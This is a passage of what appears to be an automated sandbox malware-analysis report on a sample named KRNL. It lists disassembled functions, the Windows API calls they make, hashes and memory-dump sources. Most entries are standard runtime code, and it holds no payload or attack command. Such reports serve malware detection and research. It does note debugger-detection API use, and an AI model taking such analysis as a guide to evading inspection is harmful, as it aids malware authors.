                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
                                                                                                                                                                                                                                                          • Instruction ID: 5632d1c138e7a82584e457cfc60b87353c65b2defacd1043c6c2c13a66e8f8c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C331F6B5D013199BDF61DFA5D9497CDBBB8AF08300F1081AAE44CAB290EB759A848F45
                                                                                                                                                                                                                                                          Function 00701580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007015D4
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0070161E
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007016E4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 661929714-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a57365d508e0a625dccfef43f6cc9f0f385dd136e30e49041e6a73b3810ddcb
                                                                                                                                                                                                                                                          • Instruction ID: 144c3b1e139f25d2f2823486c82294d876f545970ea23867542f84ea87d34527
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a57365d508e0a625dccfef43f6cc9f0f385dd136e30e49041e6a73b3810ddcb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07619E7161020BDBDB28DF28CD82BBA77E8EF15710F9482B9E905C65C5EB39D980DB50
                                                                                                                                                                                                                                                          Function 006F7E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006F7F28
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006F7F32
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 006F7F3F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: 597348b2a7ec5c153dfb790e72049e72050435f2a332065372f27e35e04f6b58
                                                                                                                                                                                                                                                          • Instruction ID: f316c810be47ef556895d33ad8eec26b6817ad2adc8c459a982e5db5656fc8aa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 597348b2a7ec5c153dfb790e72049e72050435f2a332065372f27e35e04f6b58
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1531E27490121CABCB61DF68DC897DDBBB8AF08310F5081EAE50CA7290E7309F858F45
                                                                                                                                                                                                                                                          Function 006F00B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 006F00EC
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,AB1687B8,006E8E30,?,0070BE77,000000FF,?,006EFDB4,?,00000000,00000000,?,006EFDD8,?,006E8E30,?), ref: 006F00F0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 743729956-0
                                                                                                                                                                                                                                                          • Opcode ID: 4071d08461a8de892d955975e745dbf54534398c103a066e06e59c1032259a44
                                                                                                                                                                                                                                                          • Instruction ID: 9a32ca1685dfd01a9c26d124f1bd3f334d18b012f34f0b3e5cd0a3598f338de4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4071d08461a8de892d955975e745dbf54534398c103a066e06e59c1032259a44
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF06C72644658EFC7019F48DC05FED77ADF708B10F01812AE912977D0DB396900DB88
                                                                                                                                                                                                                                                          Function 006F3FB2 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: (=o$0
                                                                                                                                                                                                                                                          • API String ID: 0-2708008627
                                                                                                                                                                                                                                                          • Opcode ID: 88ff1c33c503a8c5dd074b974d693b508f793996f2f413cdc870c25849e887c7
                                                                                                                                                                                                                                                          • Instruction ID: 7c0b3f41c4c464fad481de6b00e5fdada1fe5402dd9caea558e6328730171134
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88ff1c33c503a8c5dd074b974d693b508f793996f2f413cdc870c25849e887c7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4B1AC3090460E8BCB24CF68C9956FFBBB3AF51300F14462EE75297F91CE259A82CB55
                                                                                                                                                                                                                                                          Function 00705C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00705BB9,?,?,00000008,?,?,0070BCAB,00000000), ref: 00705E8B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          • Opcode ID: 3f289a89494739002088bdf4a80236a9ead76c26734e2aa20bf033ba15c92c29
                                                                                                                                                                                                                                                          • Instruction ID: 514205d7774ed455eeaefff9975c98d89a4f6315eb9cf159c2fcd3447a7372fe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f289a89494739002088bdf4a80236a9ead76c26734e2aa20bf033ba15c92c29
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B1F631610A09DFD715CF28C48AB667BE0FB45364F298699E899CF2E1C739E991CF40
                                                                                                                                                                                                                                                          Function 006EF555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006EF56B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          • Opcode ID: aaa78e6cd9131303e071612830c2bbf259f36041b6d1f2c7bc0b72098ebfb686
                                                                                                                                                                                                                                                          • Instruction ID: b06501d22b90288a85db3da86b8e68b0a54b0206a199286c7ce9f711afe0f0a9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa78e6cd9131303e071612830c2bbf259f36041b6d1f2c7bc0b72098ebfb686
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14A16AB2A117058FDB18CF59E8816DABBF6FB48724F24C52AD415E73A0D3789980CF94
                                                                                                                                                                                                                                                          Function 00701840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00701894
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                          • Opcode ID: 652491573d6cd6dc3476d88a0a4d6b634984e3df80e928b262b1bdcb7d8f96dd
                                                                                                                                                                                                                                                          • Instruction ID: 98b2f86cad7683df472d45ed7b4a7b1d1860b670a1adb4eeb2a8cbcb4969f229
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 652491573d6cd6dc3476d88a0a4d6b634984e3df80e928b262b1bdcb7d8f96dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E421B37261020AEBDB189A25CD41ABA77E8EF15721B50817EFD06C71C1EB38EE40D754
                                                                                                                                                                                                                                                          Function 007014D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00701580,00000001,00000000,?,-00000050,?,00701363,00000000,-00000002,00000000,?,00000055,?), ref: 0070154A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                          • Opcode ID: e22ffcceac063940905d2516b2c209d756eb65db871cdc34d3589d623c7325d7
                                                                                                                                                                                                                                                          • Instruction ID: 55330b00ffcf60baaa70b3d3506fc531adb40515d8d3c0a1474305c5173a8401
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e22ffcceac063940905d2516b2c209d756eb65db871cdc34d3589d623c7325d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9311E9362007059FDB189F39CC915BAB7D1FF80768B55452CE5474BB80E775B952C740
                                                                                                                                                                                                                                                          Function 00701960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007019B4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                          • Opcode ID: 61d972d1b6af41cffd426502b6cb6cb6e8e5b123b18e1be5a19fbb9c47228525
                                                                                                                                                                                                                                                          • Instruction ID: 42b8a6875acbe4bf74320cd65e61e2fb5dae57ea90ee4a08ac6bffa7f799d2f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61d972d1b6af41cffd426502b6cb6cb6e8e5b123b18e1be5a19fbb9c47228525
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111E07261120AEBDB14AF68CC169BA77ECEF05724B10827AE602C7181EB38ED009754
                                                                                                                                                                                                                                                          Function 00701B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0070179C,00000000,00000000,?), ref: 00701B39
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                          • Opcode ID: 939136415dab791b4a61d881e4f659dedf7c531ddaa8ac026e7e91716a26a892
                                                                                                                                                                                                                                                          • Instruction ID: a262828e76f6938d1ff6bd9e714e0a23ef5758a960e83c2b0a5d313dfd0da140
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 939136415dab791b4a61d881e4f659dedf7c531ddaa8ac026e7e91716a26a892
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8501F972710116EBDB289B688C09BFA77A8EF40754F558668ED06A31C0FB78FE41C790
                                                                                                                                                                                                                                                          Function 007017D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00701840,00000001,?,?,-00000050,?,0070132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0070181D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                          • Opcode ID: e63a29af1d80346a1103b93d32b80f6cc35ffe8b4b36adfd2b07da47f1e404f1
                                                                                                                                                                                                                                                          • Instruction ID: 756d3999243bb1ba125dd05e9da46b5b618c151ba22fd67a1c53ec95ca73a2c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e63a29af1d80346a1103b93d32b80f6cc35ffe8b4b36adfd2b07da47f1e404f1
